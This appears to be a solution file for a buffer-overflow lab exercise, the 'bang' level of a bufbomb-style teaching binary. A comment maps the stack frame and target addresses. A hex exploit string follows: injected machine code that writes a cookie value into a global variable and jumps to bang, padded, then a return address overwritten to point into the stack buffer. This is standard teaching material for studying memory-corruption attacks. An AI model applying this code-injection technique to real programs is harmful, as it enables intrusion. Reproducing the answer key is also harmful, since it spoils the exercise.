/*
 stack of <getbuf>:
                      ......
 return address <-- |--------|   0x0
 old EBP        <-- |--------|  -0x4
                    |--------|
                      ......
 string         <-- |--------| -0x2C
                      ......
 The target is to make EIP the address of <bang>.
 <bang> function address: 0x08 04 8D 05
 
 After getting in <bang>, to pass it, the global value 
 should be given the value of my unique Cookie(0x31 A8 15 5B).
 <cookie> address: 0x08 04 c2 20
 <global_value> address: 0x08 04 C2 18

 At 0x080491F2, esp = 0x556833D8, stack info:
                      ......
 return address <-- |--------| 0x55683414
 ebp            --> |old  EBP| 0x55683410
                    |--------|
                      ......
 string         <-- |--------| 0x556833E8
                      ......
 esp            --> |--------| 0x556833D8
 Code:
    A1 20 C2 04 08    mov 0x804c220<cookie>, %eax
    A3 18 C2 04 08    mov %eax, 0x0804C218<global_value>
    68 05 8D 04 08    push $0x08048D05
    C3                ret
 */
A1 20 C2 04 08 A3 18 C2 04 08 68 05 8D 04 08 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E8 33 68 55